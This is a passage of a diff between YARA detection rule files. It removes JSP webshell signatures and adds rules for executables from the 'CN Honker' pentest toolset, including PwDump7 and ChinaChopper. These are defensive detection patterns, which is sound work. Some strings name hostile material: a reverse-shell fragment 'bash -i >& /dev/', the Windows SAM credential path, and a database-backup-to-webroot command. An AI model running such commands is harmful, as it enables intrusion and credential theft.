+		logic_hash = "e8aff3e1e536cd35b10bdaab4818542bce284e7ed3aa7ef1920763669faf4c8a"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$scan1 = "DirectoryInfo" nocase fullword wide ascii
-		$scan2 = "GetDirectories" nocase fullword wide ascii
-		$scan3 = "Create" nocase fullword wide ascii
-		$scan4 = "File" nocase fullword wide ascii
-		$scan5 = "System.IO" nocase fullword wide ascii
-		$scan6 = "CanWrite" nocase fullword wide ascii
-		$scan7 = "Delete" nocase fullword wide ascii
-		$sus1 = "upload" nocase fullword wide ascii
-		$sus2 = "shell" nocase wide ascii
-		$sus3 = "orking directory" nocase fullword wide ascii
-		$sus4 = "scan" nocase wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
+		$s1 = "User-Agent: %Inject_Here%" fullword wide
+		$s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii
 
 	condition:
-		filesize < 10KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and 6 of ( $scan* ) and any of ( $sus* )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Regeorg : FILE
+rule SIGNATURE_BASE_CN_Honker_Exp_Ms11011 : FILE
 {
 	meta:
-		description = "Webshell regeorg JSP version"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cbb90005-d8f8-5c64-85d1-29e466f48c25"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "https://github.com/sensepost/reGeorg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5519-L5569"
+		description = "Sample from CN Honker Pentest Toolset - file ms11011.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fc092166-73cd-58f6-b034-a2fe2c5fb859"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L450-L468"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6db49e43722080b5cd5f07e058a073ba5248b584"
-		hash = "650eaa21f4031d7da591ebb68e9fc5ce5c860689"
-		hash = "00c86bf6ce026ccfaac955840d18391fbff5c933"
-		hash = "6db49e43722080b5cd5f07e058a073ba5248b584"
-		hash = "9108a33058aa9a2fb6118b719c5b1318f33f0989"
-		logic_hash = "9d4c60a4daaadf6cefe8bf1d84b1e4af491cd23136332db4a022715b265c8f4e"
-		score = 75
-		quality = 25
+		hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
+		logic_hash = "f92d71f163a49a158d85b821d71fd17e84e0d3deb19515ae0cf6a063a05c027b"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$jgeorg1 = "request" fullword wide ascii
-		$jgeorg2 = "getHeader" fullword wide ascii
-		$jgeorg3 = "X-CMD" fullword wide ascii
-		$jgeorg4 = "X-STATUS" fullword wide ascii
-		$jgeorg5 = "socket" fullword wide ascii
-		$jgeorg6 = "FORWARD" fullword wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
+		$s0 = "\\i386\\Hello.pdb" ascii
+		$s1 = "OS not supported." fullword ascii
+		$s2 = ".Rich5" fullword ascii
+		$s3 = "Not supported." fullword wide
+		$s5 = "cmd.exe" fullword ascii
 
 	condition:
-		filesize < 300KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and all of ( $jgeorg* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_HTTP_Proxy : FILE
+rule SIGNATURE_BASE_CN_Honker_DLL_Passive_Privilege_Escalation_Ws2Help : FILE
 {
 	meta:
-		description = "Webshell JSP HTTP proxy"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "55be246e-30a8-52ed-bc5f-507e63bbfe16"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5571-L5619"
+		description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L470-L485"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2f9b647660923c5262636a5344e2665512a947a4"
-		hash = "97c1e2bf7e769d3fc94ae2fc74ac895f669102c6"
-		hash = "2f9b647660923c5262636a5344e2665512a947a4"
-		logic_hash = "7183902d43fc633db06a41b4a6bc02d2eb5662b7ee08080b57563783b8b67568"
-		score = 75
-		quality = 25
+		hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
+		logic_hash = "e13f33e48d5c1aeaef6c50287f74e03fb7b65667d597768d448e76f5a375b34f"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$jh1 = "OutputStream" fullword wide ascii
-		$jh2 = "InputStream" wide ascii
-		$jh3 = "BufferedReader" fullword wide ascii
-		$jh4 = "HttpRequest" fullword wide ascii
-		$jh5 = "openConnection" fullword wide ascii
-		$jh6 = "getParameter" fullword wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
+		$s0 = "PassMinDll.dll" fullword ascii
+		$s1 = "\\ws2help.dll" ascii
 
 	condition:
-		filesize < 10KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and all of ( $jh* )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Writer_Nano : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell : FILE
 {
 	meta:
-		description = "JSP file writer"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "422a18f2-d6d4-5b42-be15-1eafe44e01cf"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5621-L5702"
+		description = "Sample from CN Honker Pentest Toolset - file Webshell.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "12870766-2b85-522d-9ad8-abba2786caaf"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L487-L503"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ac91e5b9b9dcd373eaa9360a51aa661481ab9429"
-		hash = "c718c885b5d6e29161ee8ea0acadb6e53c556513"
-		hash = "9f1df0249a6a491cdd5df598d83307338daa4c43"
-		hash = "5e241d9d3a045d3ade7b6ff6af6c57b149fa356e"
-		logic_hash = "44c11570c610b849ba9c7506fd9ef3575d270e79d7aaf5c26d54ab3f64cfc94f"
-		score = 75
-		quality = 23
+		hash = "c85bd09d241c2a75b4e4301091aa11ddd5ad6d59"
+		logic_hash = "d48a10313afcb5a2084229937703bbc11958a5cd11f8f27fbc8dae15ddfd5ed1"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$payload1 = ".write" wide ascii
-		$payload2 = "getBytes" fullword wide ascii
-		$payload3 = ".decodeBuffer" wide ascii
-		$payload4 = "FileOutputStream" fullword wide ascii
-		$logger1 = "getLogger" fullword ascii wide
-		$logger2 = "FileHandler" fullword ascii wide
-		$logger3 = "addHandler" fullword ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
-		$jw_sus1 = /getParameter\("."\)/ ascii wide
-		$jw_sus4 = "yoco" fullword ascii wide
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
+		$s1 = "Windows NT users: Please note that having the WinIce/SoftIce" fullword ascii
+		$s2 = "Do you want to cancel the file download?" fullword ascii
+		$s3 = "Downloading: %s" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 381KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Aspxclient : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file AspxClient.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7e38365c-ffe5-5fcd-8bd6-948d255d6e10"
+		date = "2015-06-23"
+		modified = "2022-12-21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L505-L523"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "67569a89128f503a459eab3daa2032261507f2d2"
+		logic_hash = "4d0a93434673952fed38e384db526275b9eb32bac9a207c91f792d4d113c40f1"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "\\tools\\hashq\\hashq.exe" wide
+		$s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" ascii
+		$s3 = "\\myshell.mdb" wide
+		$s4 = "injectfile" fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them
+}
+rule SIGNATURE_BASE_CN_Honker_Fckeditor : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L525-L540"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "4b16ae12c204f64265acef872526b27111b68820"
+		logic_hash = "0fd231fc81b2b7b5647a8016774f35751ac68646856a15c17ce4d2c07eaf1761"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide
+		$s7 = "Fckeditor.exe" fullword wide
 
 	condition:
-		( any of ( $input* ) and any of ( $req* ) ) and ( filesize < 200 or ( filesize < 1000 and any of ( $jw_sus* ) ) ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( 2 of ( $payload* ) or all of ( $logger* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1340KB and all of them
 }
-rule SIGNATURE_BASE_EXT_WEBSHELL_JSP_Generic_Tiny : FILE
+rule SIGNATURE_BASE_CN_Honker_Codeeer_Explorer : FILE
 {
 	meta:
-		description = "Generic JSP webshell tiny"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fad14524-de44-52ea-95e6-3e5de3138926"
-		date = "2021-01-07"
-		modified = "2024-12-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5704-L5789"
+		description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d4a88ae7-c0b2-57d2-a070-3dd748a30a3a"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L542-L557"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8fd343db0442136e693e745d7af1018a99b042af"
-		hash = "87c3ac9b75a72187e8bc6c61f50659435dbdc4fde6ed720cebb93881ba5989d8"
-		hash = "1aa6af726137bf261849c05d18d0a630d95530588832aadd5101af28acc034b5"
-		logic_hash = "a6bf86961bc07b312fc24362d70d22ce826a2e918e1e0e8679bd415783d8500a"
-		score = 75
-		quality = 23
+		hash = "f32e05f3fefbaa2791dd750e4a3812581ce0f205"
+		logic_hash = "299d0181beb5032dcb327516a7526d6131e2212623ffa9e592f54f80473b098d"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$payload1 = "ProcessBuilder" fullword wide ascii
-		$payload2 = "URLClassLoader" fullword wide ascii
-		$payload_rt1 = "Runtime" fullword wide ascii
-		$payload_rt2 = "getRuntime" fullword wide ascii
-		$payload_rt3 = "exec" fullword wide ascii
-		$jg_sus1 = "xe /c" ascii wide
-		$jg_sus2 = /getParameter\("."\)/ ascii wide
-		$jg_sus3 = "</pre>" ascii wide
-		$jg_sus4 = "BASE64Decoder" fullword ascii wide
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
-		$fixed_cmd1 = "bash -i >& /dev/" ascii wide
-		$fp1 = "Find Security Bugs is a plugin that aims to help security audit.</Details>"
+		$s2 = "Codeeer Explorer.exe" fullword wide
+		$s12 = "webBrowser1_ProgressChanged" fullword ascii
 
 	condition:
-		(( filesize < 1000 and any of ( $jg_sus* ) ) or filesize < 250 ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( ( any of ( $input* ) and any of ( $req* ) ) or ( any of ( $fixed_cmd* ) ) ) and ( 1 of ( $payload* ) or all of ( $payload_rt* ) ) and not any of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 470KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic : FILE
+rule SIGNATURE_BASE_CN_Honker_Swordhonkeredition : FILE
 {
 	meta:
-		description = "Generic JSP webshell"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "7535ade8-fc65-5558-a72c-cc14c3306390"
-		date = "2021-01-07"
-		modified = "2025-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5791-L5885"
+		description = "Sample from CN Honker Pentest Toolset - file SwordHonkerEdition.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5688fa03-bcb0-545d-9fdf-7ab48a389424"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L559-L575"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4762f36ca01fb9cda2ab559623d2206f401fc0b1"
-		hash = "bdaf9279b3d9e07e955d0ce706d9c42e4bdf9aa1"
-		hash = "ee9408eb923f2d16f606a5aaac7e16b009797a07"
-		logic_hash = "1a464e222704cfc947ed2f1c027c7871db8ab73e5130a309738afd25c8e614ab"
-		score = 75
-		quality = -24
+		hash = "3f9479151c2cada04febea45c2edcf5cece1df6c"
+		logic_hash = "cc18e68f7c3eff69a75333f3b605c89b024c6763f7b97e0ce20ce14bfe28df0d"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$susp0 = "cmd" fullword nocase ascii wide
-		$susp1 = "command" fullword nocase ascii wide
-		$susp2 = "shell" fullword nocase ascii wide
-		$susp3 = "download" fullword nocase ascii wide
-		$susp4 = "upload" fullword nocase ascii wide
-		$susp5 = "Execute" fullword nocase ascii wide
-		$susp6 = "\"pwd\"" ascii wide
-		$susp7 = "\"</pre>" ascii wide
-		$susp8 = /\\u00\d\d\\u00\d\d\\u00\d\d\\u00\d\d/ ascii wide
-		$susp9 = "*/\\u00" ascii wide
-		$fp1 = "command = \"cmd.exe /c set\";"
-		$dex1 = "dex\n0"
-		$dex2 = "dey\n0"
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
-		$payload1 = "ProcessBuilder" fullword ascii wide
-		$payload2 = "processCmd" fullword ascii wide
-		$rt_payload1 = "Runtime" fullword ascii wide
-		$rt_payload2 = "getRuntime" fullword ascii wide
-		$rt_payload3 = "exec" fullword ascii wide
+		$s0 = "\\bin\\systemini\\MyPort.ini" wide
+		$s1 = "PortThread=200 //" fullword wide
+		$s2 = " Port Open -> " fullword wide
 
 	condition:
-		filesize < 300KB and not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and ( 1 of ( $payload* ) or all of ( $rt_payload* ) ) and not any of ( $fp* ) and any of ( $susp* )
+		uint16( 0 ) == 0x5a4d and filesize < 375KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Base64 : FILE
+rule SIGNATURE_BASE_CN_Honker_HASH_Pwdump7 : FILE
 {
 	meta:
-		description = "Generic JSP webshell with base64 encoded payload"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2eabbad2-7d10-573a-9120-b9b763fa2352"
-		date = "2021-01-24"
-		modified = "2025-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5887-L5964"
+		description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L577-L594"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8b5fe53f8833df3657ae2eeafb4fd101c05f0db0"
-		hash = "1b916afdd415dfa4e77cecf47321fd676ba2184d"
-		logic_hash = "1787b7c6e587e1745930faaac5d28338a86baf6abc19be7c0ffe875029ff6ca1"
-		score = 75
-		quality = 23
+		hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
+		logic_hash = "05f735ba3f377f71ccf3a97b3597cee7b9f36213ee2ebba19db69667529d9fac"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$one1 = "SdW50aW1l" wide ascii
-		$one2 = "J1bnRpbW" wide ascii
-		$one3 = "UnVudGltZ" wide ascii
-		$one4 = "IAdQBuAHQAaQBtAGUA" wide ascii
-		$one5 = "SAHUAbgB0AGkAbQBlA" wide ascii
-		$one6 = "UgB1AG4AdABpAG0AZQ" wide ascii
-		$two1 = "leGVj" wide ascii
-		$two2 = "V4ZW" wide ascii
-		$two3 = "ZXhlY" wide ascii
-		$two4 = "UAeABlAGMA" wide ascii
-		$two5 = "lAHgAZQBjA" wide ascii
-		$two6 = "ZQB4AGUAYw" wide ascii
-		$three1 = "TY3JpcHRFbmdpbmVGYWN0b3J5" wide ascii
-		$three2 = "NjcmlwdEVuZ2luZUZhY3Rvcn" wide ascii
-		$three3 = "U2NyaXB0RW5naW5lRmFjdG9ye" wide ascii
-		$three4 = "MAYwByAGkAcAB0AEUAbgBnAGkAbgBlAEYAYQBjAHQAbwByAHkA" wide ascii
-		$three5 = "TAGMAcgBpAHAAdABFAG4AZwBpAG4AZQBGAGEAYwB0AG8AcgB5A" wide ascii
-		$three6 = "UwBjAHIAaQBwAHQARQBuAGcAaQBuAGUARgBhAGMAdABvAHIAeQ" wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$dex1 = "dex\n0"
-		$dex2 = "dey\n0"
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii
+		$s2 = "No Users key!" fullword ascii
+		$s3 = "NO PASSWORD*********************:" fullword ascii
+		$s4 = "Unable to dump file %S" fullword ascii
 
 	condition:
-		($cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and filesize < 300KB and ( any of ( $one* ) and any of ( $two* ) or any of ( $three* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 380KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Processbuilder : FILE
+rule SIGNATURE_BASE_CN_Honker_Chinachopper : FILE
 {
 	meta:
-		description = "Generic JSP webshell which uses processbuilder to execute user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2a7c5f44-24a1-5f43-996e-945c209b79b1"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5966-L6003"
+		description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe"
+		author = "Florian Roth (Nextron Systems)"
